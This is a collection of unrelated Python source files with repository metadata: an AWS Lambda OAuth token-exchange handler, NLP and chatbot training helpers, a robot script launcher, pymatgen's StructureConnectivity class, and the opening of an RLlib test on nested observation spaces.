from urllib.parse import urlparse
import weakref
import boto3
import requests
region = environ.get('AWS_REGION')
ssm_client = boto3.client('ssm', region_name=region)
cors_headers = frozenset({'access-control-request-method', 'access-control-request-headers'})
desired_headers = frozenset({*cors_headers, 'origin', 'host', 'x-forwarded-proto'})
def auth_header(req, service_config, client_secret):
auth_value = base64.b64encode(f'{service_config.client_id}:{client_secret}'.encode())
req['headers']['authorization'] = f'Basic {auth_value.decode()}'
def auth_param(req, service_config, client_secret):
req['data']['client_secret'] = client_secret
class AuthMethod(Enum):
def __new__(cls, key, fn):
obj = object.__new__(cls)
obj._value_ = key
obj.attach = fn
return obj
HEADER = ('header', auth_header)
PARAMETER = ('parameter', auth_param)
def memoize_dynamic(timeout_fn):
def inner(fn):
expiry_mapping = {}
def reset(*params):
if params in expiry_mapping:
del expiry_mapping[params]
def get(*params):
prior = expiry_mapping.get(params)
now = time.monotonic()
if prior is not None and now < prior[0]:
return prior[1]
value = fn(*params)
expiry_mapping[params] = now + timeout_fn(value), value
return value
get.reset = reset
return get
return inner
def memoize_with_timeout(timeout_sec):
return memoize_dynamic(lambda _: timeout_sec)
def memoize_with_expiry(grace_period_sec, default_valid_sec):
return memoize_dynamic(
lambda value: value.get('expires_in', default_valid_sec) - grace_period_sec
)
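# Illustrative usage sketch (not part of the original module): the memoize
# helpers cache one value per argument tuple and recompute it once the
# timeout has elapsed; the decorated function also gains a .reset() method.
# fetch_value and expensive_lookup below are hypothetical names.
#
#     @memoize_with_timeout(timeout_sec=300)
#     def fetch_value(name):
#         return expensive_lookup(name)
#
#     fetch_value('a')        # computed and cached
#     fetch_value('a')        # served from the cache for up to 300 seconds
#     fetch_value.reset('a')  # the next call recomputes the value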
@dataclass(frozen=True)
class ServiceConfig(object):
service_name: str
client_id: str
secret_parameter: str
parameter_name: str
identity_field: str
identify_with_openid: bool
permitted_identities: FrozenSet[str]
token_endpoint: str
token_endpoint_auth_method: AuthMethod
redirect_uri: str
@memoize_with_timeout(timeout_sec=60)
def get_secret(self):
return json.loads(
ssm_client.get_parameter(Name=self.secret_parameter,
WithDecryption=True)['Parameter']['Value']
)
services = {
name: ServiceConfig(
service_name=name,
**{
**config,
'permitted_identities': frozenset(config['permitted_identities']),
'token_endpoint_auth_method': AuthMethod(config['token_endpoint_auth_method']),
}
)
for name, config in json.loads(environ.get('SERVICES')).items()
}
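# Hypothetical shape of the SERVICES environment variable consumed above;
# the keys mirror the ServiceConfig fields and every value here is made up.
#
#     {
#       "example-provider": {
#         "client_id": "my-client-id",
#         "secret_parameter": "/oauth/example/client-secret",
#         "parameter_name": "/oauth/example/refresh-token",
#         "identity_field": "email",
#         "identify_with_openid": true,
#         "permitted_identities": ["me@example.com"],
#         "token_endpoint": "https://provider.example.com/oauth2/token",
#         "token_endpoint_auth_method": "parameter",
#         "redirect_uri": "https://api.example.com/example-provider/callback"
#       }
#     }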
def res(status: int, body: str, content_type='text/plain; charset=utf-8'):
return dict(
statusCode=status,
headers={'content-type': content_type},
body=body,
)
def decode_jwt_unvalidated(jwt: str):
    # Extract the payload segment (between the two dots) without verifying
    # the signature; callers rely on having received the token over TLS.
    start_index = jwt.index('.')
    end_index = jwt.index('.', start_index + 1)
    # JWT segments omit base64 padding, so restore enough '=' characters to
    # make the payload length a multiple of four before decoding.
    padding = '==='[:(4 - (end_index - start_index - 1)) % 4]
    return json.loads(base64.b64decode(jwt[start_index + 1:end_index] + padding, validate=False))
# TODO: actually set state in the browser to permit secondary authentication for providers like
# Fitbit that don't actually give you a human-readable (and thus human-configurable) user identity?
def lambda_handler(event, context):
# Apparently the API gateway doesn't normalize header case for us?!
headers = {
name.lower(): value
for name, value in event['headers'].items() if name.lower() in desired_headers
}
if headers.get('x-forwarded-proto') != 'https':
return res(403, 'Unsupported protocol')
# Use 'null' because it's an actual possible value for the header and simplifies the next check.
origin = headers.get('origin') or 'null'
unexpected_origin = origin != 'null' and origin != headers.get('host')
if unexpected_origin or any(header in cors_headers for header in headers):
# This is primarily to avoid cross-origin input reflection being used in some unknown
# malicious manner. Generally, browser CORS functionality will deny attempts to read the
# response, but it's better safe than sorry.
return res(403, 'Cross-origin requests not supported')
params = event.get('queryStringParameters', {})
error = params.get('error')
if error is not None:
# Reflections can be a bit scary, but with text/plain this _might_ be ok. We already try to
# prevent some of the most likely abuse by strictly denying CORS requests.
return res(500, f'Encountered error from service provider:\n\n{error}')
if params.get('state'):
return res(400, 'Malformed state')
code = params.get('code')
if code is None:
return res(400, 'Missing code parameter')
service_name = event['rawPath'][1:event['rawPath'].index('/', 1)]
service_config = services.get(service_name)
if service_config is None:
return res(404, 'Not found')
# Even though client_id isn't particularly private, we can still protect it against leaks via
# timing attacks.
provided_client_id = params.get('client_id')
if (provided_client_id is not None
and not compare_digest(service_config.client_id.encode(), provided_client_id.encode())):
return res(403, 'Wrong client_id')
client_secret = service_config.get_secret()['client_secret']
token_request = dict(
headers={},
data=dict(
code=code,
redirect_uri=service_config.redirect_uri,
client_id=service_config.client_id,
grant_type='authorization_code',
)
)
service_config.token_endpoint_auth_method.attach(token_request, service_config, client_secret)
# request_start = datetime.now(tz=timezone.utc)
response = requests.post(service_config.token_endpoint, **token_request)
if not response.ok:
if response.status_code in {401, 403}:
ServiceConfig.get_secret.reset(service_config)
try:
data = response.json()
if data.get('error') == 'invalid_grant':
description = data.get('error_description')
print(
f'Failed to exchange code due to invalid_grant: [{response.status_code}] {description}'
)
return res(400, 'Provided grant not valid')
except Exception as err:
# From simplejson.
if type(err).__name__ != 'JSONDecodeError':
raise
print(
f'Failed to exchange code for refresh_token: [{response.status_code}] {response.text}'
)
return res(500, 'Failed to authenticate with service provider')
# TODO: handle decreased scope set?
data = response.json()
if service_config.identify_with_openid:
id_token = data.get('id_token')
if id_token is None:
return res(500, 'No identity provided')
# We trust that this token is not forged, because we received it from Google over TLS.
identity = decode_jwt_unvalidated(id_token)
else:
identity = data
# Explicitly handle Google's terrible design where they provide the email in a field labeled
# email even when it's not verified.
if not identity.get('email_verified', True):
return res(403, 'Unverified users not permitted')
identity_value = identity.get(service_config.identity_field)
if identity_value not in service_config.permitted_identities:
return res(403, f'Access denied for {identity_value}')
access_token = data.get('access_token')
refresh_token = data.get('refresh_token')
if not refresh_token:
if not access_token:
return res(500, 'No authorization tokens returned by service provider')
return res(500, 'Failed to get durable access to service')
token_type = data.get('token_type')
if token_type != 'Bearer':
print(f'Got token of type `{token_type}` instead of Bearer')
# expires_at = datetime.timestamp(request_start + timedelta(seconds=data.get('expires_in', 3600)))
param_name = service_config.parameter_name
result = ssm_client.put_parameter(
Name=param_name,
Value=json.dumps(dict(refresh_token=refresh_token)),
Type='SecureString',
Overwrite=True,
)
version = result['Version']
print(f'Saved new refresh token in {param_name} as version {version}')
return res(200, 'Successfully stored new token')
| 35.580645
| 107
| 0.668178
|
3732cfbe2b887577becf6960745837d4cfa19505
| 2,683
|
py
|
Python
|
language-translation/helper.py
|
silencehero/-udacity-deep-learning
|
d726f82538309ad75f12211c73d2ba9bc218eb92
|
[
"MIT"
] | 4,171
|
2017-01-29T23:58:50.000Z
|
2022-03-27T14:58:47.000Z
|
language-translation/helper.py
|
silencehero/-udacity-deep-learning
|
d726f82538309ad75f12211c73d2ba9bc218eb92
|
[
"MIT"
] | 154
|
2017-03-03T12:42:46.000Z
|
2021-07-27T18:21:10.000Z
|
language-translation/helper.py
|
silencehero/-udacity-deep-learning
|
d726f82538309ad75f12211c73d2ba9bc218eb92
|
[
"MIT"
] | 4,928
|
2017-01-30T05:07:08.000Z
|
2022-03-31T02:09:34.000Z
|
import os
import pickle
import copy
import numpy as np
CODES = {'<PAD>': 0, '<EOS>': 1, '<UNK>': 2, '<GO>': 3 }
def load_data(path):
"""
Load Dataset from File
"""
input_file = os.path.join(path)
with open(input_file, 'r', encoding='utf-8') as f:
return f.read()
def preprocess_and_save_data(source_path, target_path, text_to_ids):
"""
    Preprocess Text Data. Save to file.
"""
# Preprocess
source_text = load_data(source_path)
target_text = load_data(target_path)
source_text = source_text.lower()
target_text = target_text.lower()
source_vocab_to_int, source_int_to_vocab = create_lookup_tables(source_text)
target_vocab_to_int, target_int_to_vocab = create_lookup_tables(target_text)
source_text, target_text = text_to_ids(source_text, target_text, source_vocab_to_int, target_vocab_to_int)
# Save Data
with open('preprocess.p', 'wb') as out_file:
pickle.dump((
(source_text, target_text),
(source_vocab_to_int, target_vocab_to_int),
(source_int_to_vocab, target_int_to_vocab)), out_file)
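# A minimal sketch (not part of this helper) of the text_to_ids callback the
# function above expects: it maps every word to its id and appends the <EOS>
# id to each target sentence. The real implementation lives in the project
# notebook, so this is only an assumed shape.
#
#     def text_to_ids(source_text, target_text, source_vocab_to_int, target_vocab_to_int):
#         source_id_text = [[source_vocab_to_int[word] for word in line.split()]
#                           for line in source_text.split('\n')]
#         target_id_text = [[target_vocab_to_int[word] for word in line.split()]
#                           + [target_vocab_to_int['<EOS>']]
#                           for line in target_text.split('\n')]
#         return source_id_text, target_id_text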
def load_preprocess():
"""
    Load the Preprocessed Training data from the pickle file
"""
with open('preprocess.p', mode='rb') as in_file:
return pickle.load(in_file)
def create_lookup_tables(text):
"""
Create lookup tables for vocabulary
"""
vocab = set(text.split())
vocab_to_int = copy.copy(CODES)
for v_i, v in enumerate(vocab, len(CODES)):
vocab_to_int[v] = v_i
int_to_vocab = {v_i: v for v, v_i in vocab_to_int.items()}
return vocab_to_int, int_to_vocab
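# Example (illustrative): the special CODES keep their fixed ids and every
# word in the text gets an id after them.
#
#     >>> vocab_to_int, int_to_vocab = create_lookup_tables('new moon . new day .')
#     >>> vocab_to_int['<PAD>']
#     0
#     >>> int_to_vocab[vocab_to_int['moon']]
#     'moon'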
def save_params(params):
"""
Save parameters to file
"""
with open('params.p', 'wb') as out_file:
pickle.dump(params, out_file)
def load_params():
"""
Load parameters from file
"""
with open('params.p', mode='rb') as in_file:
return pickle.load(in_file)
def batch_data(source, target, batch_size):
"""
Batch source and target together
"""
for batch_i in range(0, len(source)//batch_size):
start_i = batch_i * batch_size
source_batch = source[start_i:start_i + batch_size]
target_batch = target[start_i:start_i + batch_size]
yield np.array(pad_sentence_batch(source_batch)), np.array(pad_sentence_batch(target_batch))
def pad_sentence_batch(sentence_batch):
"""
Pad sentence with <PAD> id
"""
max_sentence = max([len(sentence) for sentence in sentence_batch])
return [sentence + [CODES['<PAD>']] * (max_sentence - len(sentence))
for sentence in sentence_batch]
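# Minimal sanity-check sketch (not part of the original helper): pads a toy
# batch so every sentence reaches the length of the longest one.
if __name__ == '__main__':
    demo_batch = [[5, 6, 7], [8, 9]]
    padded = pad_sentence_batch(demo_batch)
    assert padded == [[5, 6, 7], [8, 9, CODES['<PAD>']]]
    print(padded)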
| 26.83
| 110
| 0.664555
|
371b825fefe15246d3f07279fb11ab17b74f2065
| 5,558
|
py
|
Python
|
training/encoderDecoder_main.py
|
aalto-speech/FinChat
|
2792dafc550761e5af1ccd69ec55185716cd5e07
|
[
"BSD-3-Clause"
] | 3
|
2020-11-03T14:01:49.000Z
|
2021-12-27T07:39:14.000Z
|
training/encoderDecoder_main.py
|
aalto-speech/FinChat
|
2792dafc550761e5af1ccd69ec55185716cd5e07
|
[
"BSD-3-Clause"
] | 3
|
2020-06-04T11:40:30.000Z
|
2020-06-04T11:41:08.000Z
|
training/encoderDecoder_main.py
|
aalto-speech/FinChat
|
2792dafc550761e5af1ccd69ec55185716cd5e07
|
[
"BSD-3-Clause"
] | 2
|
2020-06-12T14:13:32.000Z
|
2020-06-23T08:28:15.000Z
|
__author__ = "Original code by Matthew Inkawhich <https://github.com/MatthewInkawhich>, modified by Juho Leinonen"
__copyright__ = "BSD 3-Clause license, 2017, Pytorch contributors"
# The script that prepares the data and trains the models.
# coding: utf-8
#
# Chatbot Tutorial
# ================
# **Author:** `Matthew Inkawhich <https://github.com/MatthewInkawhich>`_
#
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import torch
from torch.jit import script, trace
import torch.nn as nn
from torch import optim
import torch.nn.functional as F
import csv
import random
import re
import os
import unicodedata
import codecs
from io import open
import itertools
import math
import argparse
from encoderDecoder_prep_data import *
from encoderDecoder_voc import Voc
from encoderDecoder_global_variables import *
from encoderDecoder_models import *
from encoderDecoder_training import *
from encoderDecoder_hyperparameters import *
################################################
######## ALL VARIABLES HERE ####################
################################################
parser = argparse.ArgumentParser(description='Encoder-Decoder main that ties other modules together')
parser.add_argument('job_name', type=str,
help='job id from slurm')
args = parser.parse_args()
USE_CUDA = torch.cuda.is_available()
device = torch.device("cuda" if USE_CUDA else "cpu")
random.seed(SEED)
torch.manual_seed(SEED)
# Define path to new file
inputfile = os.path.join(corpus, source_txt_file)
datafile = os.path.join(corpus, source_csv_file)
save_dir = os.path.join("../models", parent_folder_name, args.job_name)
small_batch_size = 5
# Set checkpoint to load from; set to None if starting from scratch
loadFilename = None
checkpoint_iter = 4000
#loadFilename = os.path.join(save_dir, model_name, corpus_name,
# '{}-{}_{}'.format(encoder_n_layers, decoder_n_layers, hidden_size),
# '{}_checkpoint.tar'.format(checkpoint_iter))
###############################################
######### RUNNING THE SCRIPT ##################
###############################################
printLines(os.path.join(corpus, source_txt_file))
# Load & Preprocess Data
# ----------------------
print("\nProcessing corpus...")
# Write new csv file
print("\nWriting newly formatted file...")
createSentencePairsCSV(inputfile, datafile)
# Print a sample of lines
print("\nSample lines from file:")
printLines(datafile)
# Print some pairs to validate
voc, pairs = loadPrepareData(corpus, corpus_name, datafile, save_dir)
print("\npairs:")
for pair in pairs[:10]:
print(pair)
# Load and trim data
# ~~~~~~~~~~~~~~~~~~
# Trim voc and pairs
pairs = trimRareWords(voc, pairs, MIN_COUNT)
# Example for validation
batches = batch2TrainData(voc, [random.choice(pairs) for _ in range(small_batch_size)])
input_variable, lengths, target_variable, mask, max_target_len = batches
print("input_variable:", input_variable)
print("lengths:", lengths)
print("target_variable:", target_variable)
print("mask:", mask)
print("max_target_len:", max_target_len)
# Load model if a loadFilename is provided
if loadFilename:
# If loading on same machine the model was trained on
checkpoint = torch.load(loadFilename)
# If loading a model trained on GPU to CPU
#checkpoint = torch.load(loadFilename, map_location=torch.device('cpu'))
encoder_sd = checkpoint['en']
decoder_sd = checkpoint['de']
encoder_optimizer_sd = checkpoint['en_opt']
decoder_optimizer_sd = checkpoint['de_opt']
embedding_sd = checkpoint['embedding']
voc.__dict__ = checkpoint['voc_dict']
print('Building encoder and decoder ...')
# Initialize word embeddings
embedding = nn.Embedding(voc.num_words, hidden_size)
if loadFilename:
embedding.load_state_dict(embedding_sd)
# Initialize encoder & decoder models
encoder = EncoderRNN(hidden_size, embedding, encoder_n_layers, dropout)
decoder = LuongAttnDecoderRNN(attn_model, embedding, hidden_size, voc.num_words, decoder_n_layers, dropout)
if loadFilename:
encoder.load_state_dict(encoder_sd)
decoder.load_state_dict(decoder_sd)
# Use appropriate device
encoder = encoder.to(device)
decoder = decoder.to(device)
print('Models built and ready to go!')
# Run Training
# ~~~~~~~~~~~~
#
# Ensure dropout layers are in train mode
encoder.train()
decoder.train()
# Initialize optimizers
print('Building optimizers ...')
encoder_optimizer = optim.Adam(encoder.parameters(), lr=learning_rate)
decoder_optimizer = optim.Adam(decoder.parameters(), lr=learning_rate * decoder_learning_ratio)
if loadFilename:
encoder_optimizer.load_state_dict(encoder_optimizer_sd)
decoder_optimizer.load_state_dict(decoder_optimizer_sd)
# If CUDA is available, move any optimizer state loaded from a checkpoint
# onto the GPU (calling .cuda() on a CPU-only machine would fail).
if USE_CUDA:
    for state in encoder_optimizer.state.values():
        for k, v in state.items():
            if isinstance(v, torch.Tensor):
                state[k] = v.cuda()
    for state in decoder_optimizer.state.values():
        for k, v in state.items():
            if isinstance(v, torch.Tensor):
                state[k] = v.cuda()
# Run training iterations
print("Starting Training!")
trainIters(model_name, voc, pairs, encoder, decoder, encoder_optimizer, decoder_optimizer,
embedding, encoder_n_layers, decoder_n_layers, teacher_forcing_ratio, save_dir, n_iteration, batch_size,
print_every, save_every, clip, corpus_name, loadFilename, device)
# Conclusion
# ----------
| 30.371585
| 115
| 0.709968
|
77b03721b9e9ed767fed924883e59da8c6aab470
| 911
|
py
|
Python
|
Diddyborg_python/Legacy/pooling.py
|
puat133/DiddyBorg_Sensor_Fusion
|
60b2511d3f38fa4e913199df2a3a734c5f28ad5c
|
[
"Apache-2.0"
] | 2
|
2019-10-02T06:21:56.000Z
|
2021-05-06T17:12:35.000Z
|
Diddyborg_python/Legacy/pooling.py
|
EEA-sensors/elec-e8740-project-code-template
|
ef7020a9ed4f2ee25756dd907a16d602bffeb6fe
|
[
"Apache-2.0"
] | null | null | null |
Diddyborg_python/Legacy/pooling.py
|
EEA-sensors/elec-e8740-project-code-template
|
ef7020a9ed4f2ee25756dd907a16d602bffeb6fe
|
[
"Apache-2.0"
] | 1
|
2021-04-01T21:39:44.000Z
|
2021-04-01T21:39:44.000Z
|
import os
from multiprocessing import Pool
# processes = ('a.py','b.py', 'c.py')
processes = ('IMU.py','MotorControl.py')
def run_process(process):
os.system('python3 {}'.format(process))
pool = Pool(processes=2)
pool.map(run_process, processes)
| 75.916667
| 103
| 0.194292
|
3fab5773cbe73d0707e2e42ebebc9dd838a7b477
| 15,074
|
py
|
Python
|
pymatgen/analysis/chemenv/connectivity/structure_connectivity.py
|
jhkim96/pymatgen
|
8c1b3633897e14373d957aa2955c50176c68b71d
|
[
"MIT"
] | 1
|
2020-02-08T08:20:45.000Z
|
2020-02-08T08:20:45.000Z
|
pymatgen/analysis/chemenv/connectivity/structure_connectivity.py
|
jhkim96/pymatgen
|
8c1b3633897e14373d957aa2955c50176c68b71d
|
[
"MIT"
] | null | null | null |
pymatgen/analysis/chemenv/connectivity/structure_connectivity.py
|
jhkim96/pymatgen
|
8c1b3633897e14373d957aa2955c50176c68b71d
|
[
"MIT"
] | null | null | null |
import networkx as nx
import numpy as np
import collections
from pymatgen.analysis.chemenv.coordination_environments.structure_environments import LightStructureEnvironments
from pymatgen.analysis.chemenv.connectivity.environment_nodes import get_environment_node
from pymatgen.analysis.chemenv.connectivity.connected_components import ConnectedComponent
from monty.json import MSONable
from monty.json import jsanitize
import logging
__author__ = "David Waroquiers"
__copyright__ = "Copyright 2012, The Materials Project"
__credits__ = "Geoffroy Hautier"
__version__ = "1.0"
__maintainer__ = "David Waroquiers"
__email__ = "david.waroquiers@gmail.com"
__date__ = "June 25, 2019"
def get_delta_image(isite1, isite2, data1, data2):
"""
Helper method to get the delta image between one environment and another
from the ligand's delta images.
"""
if data1['start'] == isite1:
if data2['start'] == isite2:
return np.array(data1['delta']) - np.array(data2['delta'])
else:
return np.array(data1['delta']) + np.array(data2['delta'])
else:
if data2['start'] == isite2:
return -np.array(data1['delta']) - np.array(data2['delta'])
else:
return -np.array(data1['delta']) + np.array(data2['delta'])
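# Worked example (illustrative; only the 'start' and 'delta' keys are read):
#
#     get_delta_image(0, 1,
#                     {'start': 0, 'delta': np.array([1, 0, 0])},
#                     {'start': 1, 'delta': np.array([0, 0, 0])})
#
# returns array([1, 0, 0]), i.e. the periodic image shift of site 1 relative
# to site 0 through their common ligand.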
class StructureConnectivity(MSONable):
"""
Main class containing the connectivity of a structure.
"""
def __init__(self, light_structure_environment, connectivity_graph=None, environment_subgraphs=None):
"""
Constructor for the StructureConnectivity object.
Args:
light_structure_environment: a LightStructureEnvironments object
containing the relevant local environments
for the sites in the structure.
connectivity_graph: the networkx MultiGraph if it has already been computed,
e.g. stored in a file or dict and StructureConnectivity
is reconstructed from that file or dict.
environment_subgraphs: the different subgraphs of environments that have
been computed if any (as for connectivity_graph, only
if it is reconstructed from a file or dict).
"""
self.light_structure_environments = light_structure_environment
if connectivity_graph is None:
self._graph = nx.MultiGraph()
else:
self._graph = connectivity_graph
if environment_subgraphs is None:
self.environment_subgraphs = {}
else:
self.environment_subgraphs = environment_subgraphs
def environment_subgraph(self, environments_symbols=None, only_atoms=None):
if environments_symbols is not None:
self.setup_environment_subgraph(environments_symbols=environments_symbols, only_atoms=only_atoms)
try:
return self._environment_subgraph
except AttributeError:
all_envs = self.light_structure_environments.environments_identified()
self.setup_environment_subgraph(environments_symbols=all_envs, only_atoms=only_atoms)
return self._environment_subgraph
def add_sites(self):
"""
Add the sites in the structure connectivity graph.
"""
self._graph.add_nodes_from(list(range(len(self.light_structure_environments.structure))))
def add_bonds(self, isite, site_neighbors_set):
"""
Add the bonds for a given site index to the structure connectivity graph.
Args:
isite: Index of the site for which the bonds have to be added.
            site_neighbors_set: Neighbors set of the site.
"""
existing_edges = self._graph.edges(nbunch=[isite], data=True)
for nb_index_and_image in site_neighbors_set.neighb_indices_and_images:
nb_index_unitcell = nb_index_and_image['index']
nb_image_cell = nb_index_and_image['image_cell']
exists = False
if np.allclose(nb_image_cell, np.zeros(3)):
for (isite1, ineighb1, data1) in existing_edges:
if np.allclose(data1['delta'], np.zeros(3)) and nb_index_unitcell == ineighb1:
exists = True
break
else:
if isite == nb_index_unitcell:
for (isite1, ineighb1, data1) in existing_edges:
if isite1 == ineighb1:
if np.allclose(data1['delta'],
nb_image_cell) or np.allclose(data1['delta'],
-nb_image_cell):
exists = True
break
else:
for (isite1, ineighb1, data1) in existing_edges:
if nb_index_unitcell == ineighb1:
if data1['start'] == isite:
if np.allclose(data1['delta'], nb_image_cell):
exists = True
break
elif data1['end'] == isite:
if np.allclose(data1['delta'], -nb_image_cell):
exists = True
break
else:
raise ValueError('SHOULD NOT HAPPEN ???')
if not exists:
self._graph.add_edge(isite, nb_index_unitcell, start=isite, end=nb_index_unitcell, delta=nb_image_cell)
def setup_environment_subgraph(self, environments_symbols, only_atoms=None):
"""
Set up the graph for predefined environments and optionally atoms.
Args:
environments_symbols: Symbols of the environments for the environment subgraph.
only_atoms: Atoms to be considered.
"""
logging.info('Setup of environment subgraph for environments {}'.format(', '.join(environments_symbols)))
if not isinstance(environments_symbols, collections.abc.Iterable):
environments_symbols = [environments_symbols]
environments_symbols = sorted(environments_symbols)
envs_string = '-'.join(environments_symbols)
if only_atoms is not None:
envs_string += '#' + '-'.join(sorted(only_atoms))
# Get it directly if it was already computed
if envs_string in self.environment_subgraphs:
self._environment_subgraph = self.environment_subgraphs[envs_string]
return
# Initialize graph for a subset of environments
self._environment_subgraph = nx.MultiGraph()
# Add the sites with the required environment(s)
for isite, ce_this_site_all in enumerate(self.light_structure_environments.coordination_environments):
if ce_this_site_all is None:
continue
if len(ce_this_site_all) == 0:
continue
ce_this_site = ce_this_site_all[0]['ce_symbol']
if ce_this_site in environments_symbols:
if only_atoms is None:
env_node = get_environment_node(self.light_structure_environments.structure[isite], isite,
ce_this_site)
self._environment_subgraph.add_node(env_node)
else:
if self.light_structure_environments.structure.is_ordered:
if self.light_structure_environments.structure[isite].specie.symbol in only_atoms:
env_node = get_environment_node(self.light_structure_environments.structure[isite], isite,
ce_this_site)
self._environment_subgraph.add_node(env_node)
else:
# TODO: add the possibility of a "constraint" on the minimum percentage
# of the atoms on the site
this_site_elements = [sp.symbol for sp in
self.light_structure_environments.structure[isite].species_and_occu]
for elem_symbol in this_site_elements:
if elem_symbol in only_atoms:
env_node = get_environment_node(self.light_structure_environments.structure[isite],
isite, ce_this_site)
self._environment_subgraph.add_node(env_node)
break
# Find the connections between the environments
nodes = list(self._environment_subgraph.nodes())
for inode1, node1 in enumerate(nodes):
isite1 = node1.isite
links_node1 = self._graph.edges(isite1, data=True)
for inode2, node2 in enumerate(nodes[inode1:]):
isite2 = node2.isite
links_node2 = self._graph.edges(isite2, data=True)
# We look for ligands that are common to both site1 and site2
connections_site1_site2 = {}
for (site1_1, ilig_site1, d1) in links_node1:
for (site2_1, ilig_site2, d2) in links_node2:
if ilig_site1 == ilig_site2:
delta_image = get_delta_image(isite1, isite2, d1, d2)
if isite1 == isite2 and np.all(delta_image == 0):
continue
tuple_delta_image = tuple(delta_image)
if tuple_delta_image in connections_site1_site2:
connections_site1_site2[tuple_delta_image].append((ilig_site1, d1, d2))
else:
connections_site1_site2[tuple_delta_image] = [(ilig_site1, d1, d2)]
# Remove the double self-loops ...
if isite1 == isite2:
remove_deltas = []
alldeltas = list(connections_site1_site2.keys())
alldeltas2 = list(connections_site1_site2.keys())
if (0, 0, 0) in alldeltas:
alldeltas.remove((0, 0, 0))
alldeltas2.remove((0, 0, 0))
for current_delta in alldeltas:
opp_current_delta = tuple([-dd for dd in current_delta])
if opp_current_delta in alldeltas2:
remove_deltas.append(current_delta)
alldeltas2.remove(current_delta)
alldeltas2.remove(opp_current_delta)
for remove_delta in remove_deltas:
connections_site1_site2.pop(remove_delta)
# Add all the edges
for conn, ligands in list(connections_site1_site2.items()):
self._environment_subgraph.add_edge(node1, node2, start=node1.isite, end=node2.isite,
delta=conn, ligands=ligands)
self.environment_subgraphs[envs_string] = self._environment_subgraph
def setup_connectivity_description(self):
pass
def get_connected_components(self, environments_symbols=None, only_atoms=None):
connected_components = []
env_subgraph = self.environment_subgraph(environments_symbols=environments_symbols, only_atoms=only_atoms)
for component_nodes in nx.connected_components(env_subgraph):
graph = env_subgraph.subgraph(component_nodes).copy()
connected_components.append(ConnectedComponent.from_graph(graph))
return connected_components
def setup_atom_environment_subgraph(self, atom_environment):
raise NotImplementedError()
def setup_environments_subgraph(self, environments_symbols):
raise NotImplementedError()
def setup_atom_environments_subgraph(self, atoms_environments):
raise NotImplementedError()
def print_links(self):
nodes = self.environment_subgraph().nodes()
print('Links in graph :')
for node in nodes:
print(node.isite, ' is connected with : ')
for (n1, n2, data) in self.environment_subgraph().edges(node, data=True):
if n1.isite == data['start']:
print(' - {:d} by {:d} ligands ({:d} {:d} {:d})'.format(n2.isite, len(data['ligands']),
data['delta'][0], data['delta'][1],
data['delta'][2]))
else:
print(' - {:d} by {:d} ligands ({:d} {:d} {:d})'.format(n2.isite, len(data['ligands']),
-data['delta'][0], -data['delta'][1],
-data['delta'][2]))
def as_dict(self):
return {"@module": self.__class__.__module__,
"@class": self.__class__.__name__,
"light_structure_environments": self.light_structure_environments.as_dict(),
"connectivity_graph": jsanitize(nx.to_dict_of_dicts(self._graph)),
"environment_subgraphs": {env_key: jsanitize(nx.to_dict_of_dicts(subgraph))
for env_key, subgraph in self.environment_subgraphs.items()}}
@classmethod
def from_dict(cls, d):
        # Reconstruct the graph with integers as nodes (JSON serialization turns integer keys into str keys)
cgraph = nx.from_dict_of_dicts(d['connectivity_graph'], create_using=nx.MultiGraph, multigraph_input=True)
cgraph = nx.relabel_nodes(cgraph, int) # Just relabel the nodes using integer casting (maps str->int)
# Relabel multiedges (removes multiedges with str keys and adds them back with int keys)
edges = set(cgraph.edges())
for n1, n2 in edges:
new_edges = {int(iedge): edata for iedge, edata in cgraph[n1][n2].items()}
cgraph.remove_edges_from([(n1, n2, iedge) for iedge, edata in cgraph[n1][n2].items()])
cgraph.add_edges_from([(n1, n2, iedge, edata) for iedge, edata in new_edges.items()])
return cls(LightStructureEnvironments.from_dict(d['light_structure_environments']),
connectivity_graph=cgraph,
environment_subgraphs=None)
# TODO: also deserialize the environment_subgraphs
# environment_subgraphs={env_key: nx.from_dict_of_dicts(subgraph, multigraph_input=True)
# for env_key, subgraph in d['environment_subgraphs'].items()})
| 54.028674
| 119
| 0.577882
|
89b7ab7be2ab6dc8a6e46aa77f00aeb4cdc80072
| 21,953
|
py
|
Python
|
rllib/tests/test_nested_observation_spaces.py
|
mgelbart/ray
|
4cec2286572e368a4bd64aae467751a384eff62d
|
[
"Apache-2.0"
] | 22
|
2018-05-08T05:52:34.000Z
|
2020-04-01T10:09:55.000Z
|
rllib/tests/test_nested_observation_spaces.py
|
mgelbart/ray
|
4cec2286572e368a4bd64aae467751a384eff62d
|
[
"Apache-2.0"
] | 53
|
2021-10-06T20:08:04.000Z
|
2022-03-21T20:17:25.000Z
|
rllib/tests/test_nested_observation_spaces.py
|
mgelbart/ray
|
4cec2286572e368a4bd64aae467751a384eff62d
|
[
"Apache-2.0"
] | 10
|
2018-04-27T10:50:59.000Z
|
2020-02-24T02:41:43.000Z
|
from gym import spaces
from gym.envs.registration import EnvSpec
import gym
import numpy as np
import pickle
import unittest
import ray
from ray.rllib.agents.a3c import A2CTrainer
from ray.rllib.agents.pg import PGTrainer
from ray.rllib.env import MultiAgentEnv
from ray.rllib.env.base_env import convert_to_base_env
from ray.rllib.env.vector_env import VectorEnv
from ray.rllib.models import ModelCatalog
from ray.rllib.models.tf.tf_modelv2 import TFModelV2
from ray.rllib.models.torch.fcnet import FullyConnectedNetwork
from ray.rllib.models.torch.torch_modelv2 import TorchModelV2
from ray.rllib.evaluate import rollout
from ray.rllib.tests.test_external_env import SimpleServing
from ray.tune.registry import register_env
from ray.rllib.utils.framework import try_import_tf, try_import_torch
from ray.rllib.utils.numpy import one_hot
from ray.rllib.utils.spaces.repeated import Repeated
from ray.rllib.utils.test_utils import check
tf1, tf, tfv = try_import_tf()
_, nn = try_import_torch()
DICT_SPACE = spaces.Dict(
{
"sensors": spaces.Dict(
{
"position": spaces.Box(low=-100, high=100, shape=(3,)),
"velocity": spaces.Box(low=-1, high=1, shape=(3,)),
"front_cam": spaces.Tuple(
(
spaces.Box(low=0, high=1, shape=(10, 10, 3)),
spaces.Box(low=0, high=1, shape=(10, 10, 3)),
)
),
"rear_cam": spaces.Box(low=0, high=1, shape=(10, 10, 3)),
}
),
"inner_state": spaces.Dict(
{
"charge": spaces.Discrete(100),
"job_status": spaces.Dict(
{
"task": spaces.Discrete(5),
"progress": spaces.Box(low=0, high=100, shape=()),
}
),
}
),
}
)
DICT_SAMPLES = [DICT_SPACE.sample() for _ in range(10)]
TUPLE_SPACE = spaces.Tuple(
[
spaces.Box(low=-100, high=100, shape=(3,)),
spaces.Tuple(
(
